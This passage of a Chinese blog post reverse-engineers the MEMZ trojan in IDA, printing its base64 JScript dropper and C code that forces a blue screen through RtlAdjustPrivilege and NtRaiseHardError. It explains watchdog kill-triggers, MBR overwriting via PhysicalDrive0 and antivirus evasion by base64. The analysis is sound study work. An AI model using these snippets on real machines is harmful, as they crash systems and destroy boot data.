js<\/code>\u91cc<\/p>\n\/\/\u83b7\u53d6\u7ec4\u4ef6\r\nf=new ActiveXObject(\"Scripting.FileSystemObject\");\r\n\/\/\u6253\u5f00\u6587\u4ef6x\r\ni=f.getFile(\"x\").openAsTextStream();\r\n\/\/\u521b\u5efabase64\u89e3\u5bc6\u5bf9\u8c61\r\nx=new ActiveXObject(\"MSXml2.DOMDocument\").createElement(\"Base64Data\");\r\nx.dataType=\"bin.base64\";\r\n\/\/\u8bfb\u53d6x\u4e2d\u6240\u6709\u6570\u636e\uff0c\u5e76\u89e3\u5bc6\r\nx.text=i.readAll();\r\no=new ActiveXObject(\"ADODB.Stream\");\r\no.type=1;\r\no.open();\r\no.write(x.nodeTypedValue);\r\n\/\/\u5c06\u89e3\u5bc6\u5185\u5bb9\u5199\u5165z.zip\r\nz=f.getAbsolutePathName(\"z.zip\");\r\no.saveToFile(z);\r\ns=new ActiveXObject(\"Shell.Application\");\r\n\/\/\u89e3\u538bz.zip\u5f97\u5230MEMZ.zip\r\ns.namespace(26).copyHere(s.namespace(z).items());\r\no.close();\r\ni.close();\r\n<\/pre>\n\u5f88\u660e\u663e\u8fd9\u4e2abat\u662f\u7528\u6765\u751f\u6210exe\u75c5\u6bd2\u6587\u4ef6\u7684\u3002<\/p>\n
\u5c31\u4e00\u4e2abase64<\/code>\u52a0\u5bc6\u7adf\u7136\u76f4\u63a5\u7ed5\u8fc7\u4e86360\uff1f\uff1f\uff1f\uff1f<\/p>\n <\/p>\n
<\/p>\n
<\/p>\n
\n <\/p>\n
<\/p>\n
<\/p>\n
\u76f4\u63a5\u7528IDA<\/code>\u6253\u5f00MEMZ.exe<\/code>\uff0c\u5206\u6790\u6e90\u4ee3\u7801<\/p>\n\u7a0b\u5e8f\u51fa\u53e3\u70b9\u4e3astart<\/code>\u51fd\u6570\uff0c\u8ddf\u8fdb<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/3-1.png\")
<\/p>\n
\u7136\u540e\u76f4\u63a5\u4e00\u4e2a F5 \u4e0b\u53bb<\/p>\n
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/4-1.png\")
<\/p>\n
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/5-1.png\")
<\/p>\n
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/6-2.png\")
<\/p>\n
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/7-1.png\")
<\/p>\n
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/8-1.png\")
<\/p>\n
<\/p>\n
\u89c2\u5bdf\u4e00\u4e0b\u51fd\u6570\u7684\u6d41\u7a0b\u3002<\/p>\n
<\/p>\n
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/9-1.png\")
<\/p>\n
\u9996\u5148\u83b7\u53d6\u4e86\u7a0b\u5e8f\u7684\u542f\u52a8\u53c2\u6570\uff0c\u7c7b\u4f3c\u4e8eint main(int argc,char**argv)<\/code>\uff0c\u53ea\u4e0d\u8fc7\u7528Windows API GetCommandLine()<\/code>\u7684\u65b9\u5f0f\u83b7\u53d6\u3002<\/p>\n\u7136\u540e\u518d\u5224\u65ad\u53c2\u6570\u662f\u5426\u5b58\u5728\uff0c\u5b58\u5728\u7684\u8bdd\u518d\u5224\u65ad\u662f\u4e0d\u662f\u4e3a\/watchdog<\/code>\uff0c\u662f\u7684\u8bdd\u521b\u5efa\u4e00\u4e2a\u65b0\u7ebf\u7a0b\u6267\u884csub_40114A()<\/code><\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/10-1.png\")
<\/p>\n
\u521b\u5efa\u5b8c\u65b0\u7ebf\u7a0b\u540e\uff0c\u8c03\u7528\u4e86RegisterClassEx<\/code>\u6ce8\u518c\u7a97\u53e3\u548cCreateWindowEx<\/code>\u65b0\u5efa\u7a97\u53e3\u3002<\/p>\n\u4f46\u662f\u8fd9\u91cc\u7684\u53c2\u6570\u6709\u70b9\u5947\u602a![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/11-1.png\")
<\/p>\n
RegisterClassEx<\/code>\u7684\u5b9a\u4e49
\nATOM WINAPI RegisterClassEx(
\n_In_ const WNDCLASSEX *lpwcx
\n);<\/code><\/p>\n\u53c2\u6570\u5e94\u8be5\u4e3aWNDCLASSEX*<\/code>\u800c\u4e0d\u662fSHELLEXECUTEINFO*<\/code><\/p>\n\u6709\u53ef\u80fd\u662fIDA<\/code>\u53cd\u7f16\u8bd1\u51fa\u9519\uff0c\u4e5f\u6709\u53ef\u80fd\u662f\u4f5c\u8005\u7684\u6df7\u6dc6\uff08\u53ef\u80fd\u6027\u66f4\u5927![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/12-1.png\")
\uff09<\/p>\n\u603b\u4e4b\uff0c\u5230MSDN<\/code>\u4e0a\u627e\u8fd9\u4e24\u7684\u5b9a\u4e49<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/13-1.png\")
<\/p>\n
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/14-1.png\")
<\/p>\n
\u6ce8\u610f\u7a0b\u5e8f\u4e2d\u7684\u8c03\u7528\u4e3aRegisterClassExA((const WNDCLASSEXA *)&pExecInfo.lpVerb);<\/code><\/p>\n\u6240\u4ee5SHELLEXECUTEINFO.lpVerb<\/code>\u53ca\u4ee5\u4e0b\u4e0eWNDCLASSEX.cbSize<\/code>\u53ca\u4ee5\u4e0b\u7684\u53c2\u6570\u4e00\u4e00\u5bf9\u5e94\u3002\uff08\u9879\u6570\u4e5f\u521a\u597d\u76f8\u540c\uff0c\u5927\u5c0f\u4e5f\u76f8\u7b49sizeof(*void)=sizeof(int)=sizeof(DWORD)=4<\/code>\uff09<\/p>\n\u5206\u6790\u4e00\u4e0b\u53c2\u6570\u5c31\u53ef\u4ee5\u53d1\u73b0\uff0c\u5b83\u521b\u5efa\u4e86\u4e00\u4e2a\u7c7b\u540d\u4e3ahax<\/code>\u7684\u7a97\u53e3\uff0c\u4e14\u6b64\u7a97\u53e3\u7684\u56de\u8c03\u51fd\u6570\u4e3asub_4010000<\/code>\uff0c\u5176\u4f59\u4ec0\u4e48\u4e5f\u6ca1\u6709\u3002<\/p>\n\u8ddf\u8fdb\u6b64\u51fd\u6570<\/p>\n
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/15-1.png\")
<\/p>\n
\u5728winuser.h<\/code>\u91cc\u9762\u53ef\u4ee5\u770b\u5230\u5173\u4e8eMessage<\/code>\u7cfb\u5217\u5e38\u6570\u5b9a\u4e49\u7684\u503c<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/16.png\")
<\/p>\n
WM_CLOSE<\/code>\u5bf9\u5e94\u7a97\u53e3\u5173\u95ed\u8bf7\u6c42\uff0cWM_ENDSESSION<\/code>\u5bf9\u5e94\u5173\u673a\u65f6\u5173\u95ed\u7a97\u53e3\u8bf7\u6c42<\/p>\n\u4e14\u5982\u679c\u4f20\u7ed9\u5f53\u524d\u7a97\u53e3\u7684\u6d88\u606f\u4e0d\u4e3a\u5176\u4e2d\u4efb\u4e00\u65f6\uff0c\u7a97\u53e3\u4fe1\u606f\u8f6c\u4e3aDefWindowProc<\/code>\u5904\u7406\u3002<\/p>\n\u5426\u5219\u8c03\u7528\u51fd\u6570sub_401021<\/code><\/p>\n\u8ddf\u8fdb\u6b64\u51fd\u6570<\/p>\n
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/17.png\")
<\/p>\n
\u51fd\u6570\u4e00\u5f00\u59cb\u5c31\u521b\u5efa\u4e86 20 \u4e2a\u7ebf\u7a0b\u6267\u884c\u540c\u6837\u8fd9\u4e2a\u51fd\u6570\uff0c\u8fd9\u6837\u4f1a\u53d8\u6210\u65e0\u9650\u521b\u5efa\u7ebf\u7a0b\uff0c\u5982\u679c\u6ca1\u6709\u540e\u7eed\u5904\u7406\u7cfb\u7edf\u4f1a\u5361\u6b7b\u3002<\/del><\/p>\n\u4e0a\u9762\u8fd9\u4e2a\u662f\u6211\u4e00\u5f00\u59cb\u7684\u60f3\u6cd5\u3002\u5176\u5b9e\u5b83\u662f\u9519\u7684\u3002<\/p>\n
\u8fd920\u4e2a\u7ebf\u7a0b\u6267\u884c\u7684\u4e0d\u662f\u8fd9\u4e2a\u51fd\u6570\u7684\u5f00\u5934\uff0c\u800c\u662f\u4e00\u6bb5IDA\u6ca1\u80fdF5\u51fa\u6765\u7684\u4ee3\u7801\uff0c\u5728\u8fd9\u91cc<\/p>\n
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/28-1.png\")
<\/p>\n
\uff08\u610f\u4e49\u4e0d\u660e\uff0c\u4e0b\u56fe\u770b\u5f97\u51fa\u5806\u6808\u4e5f\u662f\u5e73\u8861\u7684\uff0c\u4e0d\u77e5\u9053\u4e3a\u4ec0\u4e48IDA\u9519\u8bef<\/p>\n
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/29-1.png\")
<\/p>\n
\u6ca1\u6709\u529e\u6cd5\uff0c\u6211\u4eec\u76f4\u63a5\u5bf9\u7740\u6c47\u7f16\u5206\u6790\u3002<\/p>\n
\u9996\u5148push esi<\/code>\uff0c\u610f\u4e49\u4e0d\u660e\u3002<\/p>\n\u7136\u540e\u8c03\u7528GetCurrentThreadId<\/code>\u83b7\u53d6\u5f53\u524d\u7ebf\u7a0bID\uff0c\u4fdd\u5b58\u5728eax<\/code>\u4e2d\u3002<\/p>\n\u63a5\u7740SetWindowHookEx(idHook=5,lpfn=offset_fn,hmod=0,dwId);<\/code><\/p>\n\u67e5\u9605MSDN<\/code>\uff0c![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/30-1.png\")
<\/p>\n\u5373\u6240\u6709\u7684\u7a97\u53e3\u4e8b\u4ef6\u5c06\u4f1a\u88ab\u4f20\u9001\u5230fn<\/code>\u6240\u6307\u5411\u7684\u51fd\u6570\u5904\u7406\uff0c\u8ddf\u8fdb<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/31.png\")
<\/p>\n
\u518d\u6b21\u67e5\u8be2MSDN<\/code>\uff0ccode=3<\/code>\u5373\u521b\u5efa\u7a97\u53e3\u4e8b\u4ef6![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/32.png\")
<\/p>\n\u8ddf\u8fdb\u51fd\u6570sub_401A55<\/code><\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/33.png\")
<\/p>\n
\u53d1\u73b0\u8fd9\u662f\u4e2a\u751f\u6210\u968f\u673a\u6570\u7684\u51fd\u6570\u3002<\/p>\n
\u89c2\u5bdf\u539f\u51fd\u6570\uff0c\u751f\u6210\u7684\u968f\u673a\u6570\u90fd\u8fd4\u56de\u7ed9\u4e86v4 (LPARAM)<\/code>\uff0c\u6240\u4ee5\u8fd9\u6bb5\u4ee3\u7801\u5b9e\u73b0\u4e86\u968f\u673a\u8bbe\u7f6e\u6b64\u53e5\u67c4\u4e0a\u7684\u7a97\u53e3\u4f4d\u7f6e\u3002<\/p>\n\u4e4b\u540e\u8c03\u7528\u4e86MessageBox(hWnd=0,lpText,Caption=\"MEMZ\",0x1010=MB_OK|MB_ICONERROR|MB_SYSTEMMODAL)<\/code>\u6765\u663e\u793a\u5bf9\u8bdd\u6846\u3002<\/p>\n\u6700\u540e\u4f7f\u7528UnhookWindowHookEx<\/code>\u5378\u8f7d\u4e4b\u524d\u7684\u94a9\u5b50\u3002<\/p>\nMessageBox<\/code>\u4e2d\u7684\u5185\u5bb9lpText<\/code>\u5219\u662f\u968f\u673a\u4ee5\u4e0b\u5185\u5bb9<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/34.png\")
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/35.png\")
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/36.png\")
<\/p>\n
<\/p>\n
\u56de\u5230\u539f\u51fd\u6570\uff0c\u521b\u5efa\u5bf9\u8bdd\u6846\u540e<\/p>\n
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/18.png\")
<\/p>\n
\u9996\u5148\u83b7\u53d6(LoadLibrary<\/code>)ntdll.dll<\/code>\u4e2d\u7684RtlAdjustPrivilege<\/code>\u548cNtRaiseHardError<\/code>\u51fd\u6570\uff0c\u5982\u679c\u8fd9\u4e24\u4e2a\u51fd\u6570\u90fd\u80fd\u6210\u529f\u83b7\u53d6\u7684\u8bdd\uff0c\u5c31\u5148\u8c03\u7528v4(RtlAdjustPrivilege)<\/code>\uff0c\u518d\u8c03\u7528v6(NtRaiseHardError)<\/code><\/p>\n\u4f46\u662f\u5982\u679c\u6709\u4e00\u83b7\u53d6\u4e0d\u6210\u529f\uff0c\u5c31\u662f\u7528\u539f\u59cb\u7684\u65b9\u6cd5\u63d0\u5347\u81f3SeShutdownPrivilege<\/code>\u6743\u9650\uff0c\u6700\u540e\u8c03\u7528ExitWindowsEx<\/code>\u5f3a\u5236\u5173\u673a\u3002<\/p>\nRtlAdjustPrivilege<\/code>\u662f\u4e00\u4e2aMSDN<\/code>\u672a\u516c\u5f00\u7684\u51fd\u6570\uff0c\u56e0\u4e3a\u5b83\u53ef\u4ee5\u505a\u5230\u4e00\u884c\u63d0\u6743\uff0c\u5b8c\u7f8e\u66ff\u4ee3\u4ee5\u524d\u4f7f\u7528\u4f20\u7edf\u7684OpenProcessToken -> LookupPrivilegeValue -> AdjustTokenPrivileges<\/code>\u9ebb\u70e6\u65b9\u6cd5\u3002<\/p>\n\u6b64\u51fd\u6570\u5b9a\u4e49NTSTATUS RtlAdjustPrivilege
\n(
\nULONG Privilege, \/\/Privilege [In] Privilege index to change.
\nBOOLEAN Enable, \/\/Enable [In] If TRUE, then enable the privilege otherwise disable.
\nBOOLEAN CurrentThread, \/\/CurrentThread [In] If TRUE, then enable in calling thread, otherwise process.
\nPBOOLEAN Enabled \/\/
\nEnabled [Out] Whether privilege was previously enabled or disabled.
\n)<\/code><\/p>\n19 = 0x13 = SE_SHUTDOWN_PRIVILEGE<\/code>\u5373\u5173\u673a\u6743\u9650<\/p>\n\u540c\u6837\uff0cNtRaiseHardError<\/code>\u4e5f\u4e3antdll.dll<\/code>\u4e2dMSDN<\/code>\u672a\u516c\u5f00\u7684\u51fd\u6570\uff0c\u5b83\u7684\u529f\u80fd\u662f\u5f15\u53d1\u4e00\u6b21\u84dd\u5c4f\uff08\u4e0e\u666e\u901a\u84dd\u5c4f\u4e0d\u540c\uff0c\u8fd9\u4e2a\u84dd\u5c4f\u4e00\u822c\u7531\u786c\u4ef6\u9519\u8bef\u5f15\u8d77\uff0c\u533a\u522b\u5982\u56fe![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/u21665444573124045168fm26gp0.jpg\")
<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/e08aa918972bd407a4ae870d7e899e510eb30907.jpg\")
\uff09\u3002<\/p>\n
\u51fd\u6570\u5b9a\u4e49NTSYSAPI NTSTATUS NTAPI NtRaiseHardError
\n(
\nIN NTSTATUS ErrorStatus,
\nIN ULONG NumberOfParameters,
\nIN PUNICODE_STRING UnicodeStringParameterMask OPTIONAL,
\nIN PVOID *Parameters,
\nIN HARDERROR_RESPONSE_OPTION ResponseOption,
\nOUT PHARDERROR_RESPONSE Response
\n);<\/code><\/p>\n\u4f7f\u7528\u4f8b\u5b50\uff1a<\/p>\n
typedef \/*__success(return >= 0)*\/ LONG NTSTATUS; \r\ntypedef NTSTATUS *PNTSTATUS; \r\n \r\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) \r\n \r\ntypedef struct _LSA_UNICODE_STRING { \r\n USHORT Length; \r\n USHORT MaximumLength; \r\n PWSTR Buffer; \r\n} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING; \r\n \r\ntypedef enum _HARDERROR_RESPONSE_OPTION { \r\n OptionAbortRetryIgnore, \r\n OptionOk, \r\n OptionOkCancel, \r\n OptionRetryCancel, \r\n OptionYesNo, \r\n OptionYesNoCancel, \r\n OptionShutdownSystem \r\n} HARDERROR_RESPONSE_OPTION, *PHARDERROR_RESPONSE_OPTION; \r\n \r\ntypedef enum _HARDERROR_RESPONSE { \r\n ResponseReturnToCaller, \r\n ResponseNotHandled, \r\n ResponseAbort, \r\n ResponseCancel, \r\n ResponseIgnore, \r\n ResponseNo, \r\n ResponseOk, \r\n ResponseRetry, \r\n ResponseYes \r\n} HARDERROR_RESPONSE, *PHARDERROR_RESPONSE;\r\n\r\n\/\/\u83b7\u53d6\u51fd\u6570\u5730\u5740.......\r\n\r\nint nEn = 0;\r\nRtlAdjustPrivilege(0x13, TRUE, FALSE, &nEn);\r\nHARDERROR_RESPONSE reResponse;\r\nNtRaiseHardError(0xC000021A,0,0,0,OptionShutdownSystem,&reResponse);\r\n\r\n<\/pre>\n\uff08\u4e5f\u53ef\u4ee5\u53c2\u8003\uff1ahttps:\/\/blog.csdn.net\/AcceZn\/article\/details\/54670776<\/a><\/p>\n\u5373\u53ef\u5f15\u8d77\u4e00\u6b210xC000021A\u84dd\u5c4f\u3002\uff08\u6ce8\uff1a\u4ee3\u7801\u4e2dNtRaiseHardError<\/code>\u7684\u7b2c\u4e00\u4e2a\u53c2\u6570\u4e3a\u8d1f\u6570\u662f\u56e0\u4e3asigned int<\/code>\u7684\u6ea2\u51fa\uff09<\/p>\n <\/p>\n
\u522b\u5fd8\u4e86\uff0c\u5728\u521b\u5efa\u7a97\u53e3\u524d\u8fd8\u521b\u5efa\u4e86\u4e00\u4e2a\u7ebf\u7a0b\u6267\u884c\u51fd\u6570sub_40114A()<\/code><\/p>\n\u7ee7\u7eed\u8ddf\u8fdb<\/p>\n
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/19.png\")
<\/p>\n
\u8fd9\u4e2a\u51fd\u6570\u6d41\u7a0b\u662f\u4e00\u76ee\u4e86\u7136\u3002<\/p>\n
\u9996\u5148\u7528GetProcessImageFileName<\/code>\u83b7\u53d6\u5f53\u524d\u8fd0\u884c\u6587\u4ef6\u540d\uff0c\u7136\u540e\u5229\u7528tlhelp32.h<\/code>\u91cc\u7684CreateToolhelp32Snapshot<\/code>\u7ed3\u5408Process32First<\/code>\u548cProcess32Next<\/code>\u904d\u5386\u6240\u6709\u8fdb\u7a0b\uff0c\u4e5f\u83b7\u53d6\u8fd9\u4e9b\u8fdb\u7a0b\u7684\u6587\u4ef6\u540d\uff0c\u5e76\u5bfb\u627e\u4e0e\u5f53\u524d\u8fdb\u7a0b\u540d\u76f8\u7b49\u7684\u6570\u91cf\u3002\u5982\u679c\u6570\u91cfv4<\/code>\u6bd4\u4e4b\u524d\u7684\u6570\u91cfv7<\/code>\u8fd8\u5c11\uff08\u8bf4\u660e\u6709\u8fdb\u7a0b\u88ab\u6740\u6b7b\uff09\uff0c\u76f4\u63a5\u8c03\u7528\u51fd\u6570sub_401021<\/code>\uff0c\u5373\u4e4b\u524d\u7684\u84dd\u5c4f\/\u5173\u673a\u51fd\u6570\u3002<\/p>\n <\/p>\n
\u603b\u7ed3\u4e00\u4e0b\u76ee\u524d\u4e3a\u6b62\u7684\u6d41\u7a0b\uff1a\u4ece\u7a0b\u5e8f\u542f\u52a8\u5f00\u59cb\uff0c\u5982\u679c\u53c2\u6570\u5e26\u6709\/watchdog<\/code>\uff0c\u5219\u521b\u5efa\u4e00\u4e2a\u7ebf\u7a0b\u5224\u65ad\u662f\u5426\u6709\u5f53\u524d\u75c5\u6bd2\u7a0b\u5e8f\u88ab\u6740\u6b7b\uff0c\u6709\u7684\u8bdd\u76f4\u63a5\u84dd\u5c4f\/\u5173\u673a\u3002\u4e4b\u540e\u521b\u5efa\u4e00\u4e2a\u7a97\u53e3\uff0c\u5982\u679c\u68c0\u6d4b\u5230\u7a97\u53e3\u88ab\u5173\u95ed\u6216\u7cfb\u7edf\u5c06\u8981\u5173\u95ed\uff0c\u624b\u52a8\u521b\u5efa\u591a\u4e2a\u7ebf\u7a0b\u84dd\u5c4f\/\u5173\u673a\u3002<\/p>\n <\/p>\n
<\/p>\n
<\/p>\n
\n <\/p>\n
<\/p>\n
<\/p>\n
\u56de\u5230\u4e3b\u7a0b\u5e8f\uff0c\u7ee7\u7eed\u5f80\u4e0b\u770b\u6d41\u7a0b\u3002\uff08\u6ce8\uff1a\u6b64\u65f6\u8fd8\u5728\u6709\u53c2\u6570\u5b58\u5728\u7684\u6761\u4ef6\u5185\uff0c\u5373\u6709\u53c2\u6570\u4f46\u4e0d\u4e3a\/watchdog<\/code>\uff0c\u56e0\u4e3a\u5728\u4e4b\u524d\u521b\u5efa\u7a97\u53e3\u540e\u4f7f\u7528while<\/code>\u6b7b\u5faa\u73af\u83b7\u53d6\u5e76\u5904\u7406\u7a97\u53e3\u6d88\u606f\u3002<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/20-1.png\")
<\/p>\n
\u8fde\u7eed\u8c03\u7528CreateFile<\/code>\u548cWriteFile<\/code>\u5c1d\u8bd5\u5411\\\\.\\PhysicalDrive0<\/code>\u53730\u53f7\u78c1\u76d8\u8bbe\u5907\u5199\u5165\u6247\u533a\u5185\u5bb9\u3002\u4e2d\u95f4\u90a3\u4e00\u5927\u6bb5\u5c31\u662f\u83b7\u53d6\u5199\u5165\u5185\u5bb9\uff0c\u8fd9\u4e00\u6bb5\u5c31\u662f\u8986\u76d6\u7cfb\u7edfMBR<\/code>\u7684\u8fc7\u7a0b\u3002<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/22-1.png\")
<\/p>\n
\u9996\u5148\u6253\u5f00\u5f53\u524d\u78c1\u76d8\u76ee\u5f55\u4e0b\u7684note.txt<\/code>\uff0c\u5199\u5165\u4ee5\u4e0b\u5185\u5bb9\uff0c\u5b8c\u6210\u540e\u8c03\u7528notepad<\/code>\u5c06\u5176\u6253\u5f00\uff0c\u5373\u663e\u793a\u4e86\u8fd9\u6bb5\u4fe1\u606f\u3002<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/21-1.png\")
<\/p>\n
\u4e4b\u540e\u5faa\u73af\u521b\u5efa\u7ebf\u7a0b\u6267\u884c\u51fd\u6570sub_401A2B<\/code><\/p>\n\u7136\u540e\u8fdb\u5165while() Sleep<\/code>\u6c38\u4e45\u963b\u585e\u72b6\u6001<\/p>\n <\/p>\n
\u4e2d\u95f4\u8fd9\u4e00\u6bb5\u6709\u70b9\u96be\u5206\u6790\uff0c\u6211\u4eec\u5148\u770b\u63a5\u4e0b\u6765\u7684\u7a0b\u5e8f\u3002\uff08\u6ce8\uff1a\u6b64\u65f6\u4e3a\u65e0\u53c2\u6570\u5185<\/p>\n
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/23-1.png\")
<\/p>\n
\u4e00\u5806\u8b66\u544a\u4fe1\u606f\u3002<\/p>\n
\u90fd\u786e\u8ba4\u4e4b\u540e<\/p>\n
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/24-1.png\")
<\/p>\n
\u9996\u5148\u901a\u8fc7ShellExecuteEx<\/code>\u521b\u5efa5\u4e2a\u5e26\/watchdog<\/code>\u53c2\u6570\u7684\u7a0b\u5e8f\uff08\u4f5c\u7528\u5982\u4e0a\u5206\u6790\uff09\uff0c\u518d\u6267\u884c\u4e00\u4e2a\u5e26\/main<\/code>\u53c2\u6570\u7684\u7a0b\u5e8f\uff0c\u8fd8SetPriorityClass (0x80u=HIGH_PRIORITY_CLASS)<\/code>\u8bbe\u7f6e\u6700\u9ad8\u4f18\u5148\u7ea7\u540e\u672c\u8fdb\u7a0b\u9000\u51fa\u3002<\/p>\n <\/p>\n
<\/p>\n
<\/p>\n
\n <\/p>\n
<\/p>\n
<\/p>\n
\u73b0\u5728\u6574\u4e2a\u7a0b\u5e8f\u7684\u6d41\u7a0b\u90fd\u5927\u6982\u6e05\u695a\u4e86\uff1a\u5148\u662f\u7528\u6237\u70b9\u51fb\uff0c\u6b64\u65f6\u65e0\u53c2\u6570\uff0c\u663e\u793a\u4e24\u4e2a\u8b66\u544a\uff0c\u90fd\u786e\u8ba4\u540e\u521b\u5efa5\u4e2a\/watch<\/code>\u8fdb\u7a0b\u548c\u4e00\u4e2a\/main<\/code>\u8fdb\u7a0b\u5e76\u9000\u51fa\u3002\/watchdog<\/code>\u8fdb\u7a0b\u53ea\u662f\u68c0\u6d4b\u662f\u5426\u6709\u81ea\u5df1\u7684\u8fdb\u7a0b\u88ab\u6740\u6b7b\u6216\u8005\u8981\u5173\u673a\u4e86\uff0c\u90a3\u4e2a\u65f6\u5019\u76f4\u63a5\u84dd\u5c4f\/\u5173\u673a\u3002\/main<\/code>\u8fdb\u7a0b\u624d\u662f\u6267\u884c\u4e3b\u8981\u529f\u80fd\u7684\u8fdb\u7a0b\uff0c\u5148\u662f\u8986\u76d6\u78c1\u76d8MBR<\/code>\uff0c\u7136\u540e\u5f00\u59cb\u641e\u4e8b<\/del>\u641e\u4e8b\uff08\u597d\u50cf\u786e\u5b9e\u662f\u771f\u7684\u641e\u4e8b![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/06\/QQ\u56fe\u724720170624045141.jpg\")
\uff09\u3002<\/p>\n\u56de\u5230\u521a\u521a\u53c2\u6570\/main<\/code>\uff08\u73b0\u5728\u5df2\u7ecf\u77e5\u9053\u662f\u5b83\u4e86\uff09\u6267\u884c\u7684\u5730\u65b9\uff0c\u73b0\u5728\u6765\u8be6\u7ec6\u5206\u6790\u8fd9\u6bb5\u8c03\u7528\uff08\u5faa\u73af\u521b\u5efa\u7ebf\u7a0b\u6267\u884c\u51fd\u6570sub_401A2B<\/code>\uff09\u7684\u529f\u80fd\u3002<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/25-1.png\")
<\/p>\n
\u8ddf\u8fdbsub_401A2B()<\/code><\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/26-1.png\")
<\/p>\n
\u53d1\u73b0\u8fd9\u4e2a\u51fd\u6570\u53ea\u662f\u7b80\u5355\u5730\u8c03\u7528\u4e86\u4ee5\u53c2\u6570lpThreadParameter<\/code>\u4f20\u8fdb\u6765\u7684\u51fd\u6570\uff0c\u5e76\u4e14\u53ea\u8981\u51fd\u6570\u8c03\u7528\u6210\u529f\u7684\u8bdd\u8fd9\u4e2a\u51fd\u6570\u7684\u4e24\u4e2a\u53c2\u6570\u90fd\u81ea\u52a0\uff0c10sec\u540e\u53c8\u91cd\u65b0\u6267\u884c\u4e00\u904d\u3002<\/p>\n\u6240\u4ee5\u95ee\u9898\u7684\u6240\u5728\u4e0d\u662f\u8fd9\u4e2a\u51fd\u6570\uff0c\u800c\u662f\u53c2\u6570v9<\/code><\/p>\n\u56de\u5230\u539f\u51fd\u6570\uff0c\u5206\u6790\u4e00\u4e0b\u6d41\u7a0b\uff1a\u9996\u5148v8=0; v9=(DWORD *)&off_405130<\/code><\/p>\n\u7136\u540eSleep() v9<\/code>\u6307\u5411\u7684\u7a7a\u95f4\u7684\u7b2c\u4e8c\u4e2aDWORD<\/code>\u5b57\u8282\u7684\u6570\u636e\u5927\u5c0f\u3002<\/p>\n\u63a5\u7740CreateThread() v9<\/code>\u6307\u5411\u7684\u7a7a\u95f4\u7b2c\u4e00\u4e2aDWORD<\/code>\u6307\u5411\u7684\u51fd\u6570\u3002<\/p>\n\u6700\u540ev9<\/code>\u8d8a\u8fc7\u4e24\u4e2aDWORD<\/code>\u5b57\u8282\uff0c\u5e76\u4e14\u963b\u585e10msec\u540e\u7ee7\u7eed\u3002<\/p>\n\u770b\u5f97\u51fa\u6765\uff0c\u6700\u91cd\u8981\u7684\u5c31\u662f\u5728off_405130<\/code>\u5904\u7684\u6570\u636e\u4e86\u3002<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/27-1.png\")
<\/p>\n
\u51fd\u6570\u90fd\u76f4\u63a5\u786c\u7f16\u7801\u4e86\u5728\u91cc\u9762\uff0c\u6211\u4eec\u4e00\u4e2a\u4e00\u4e2a\u5206\u6790\u3002<\/p>\n
<\/p>\n
\u6765\u5230sub_4014FC<\/code>\uff08\u51fd\u6570\u53ea\u6709\u4e00\u4e2a\u53c2\u6570\uff0c\u6211\u4e5f\u4e0d\u77e5\u9053\u4e3a\u4ec0\u4e48<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/37.png\")
<\/p>\n
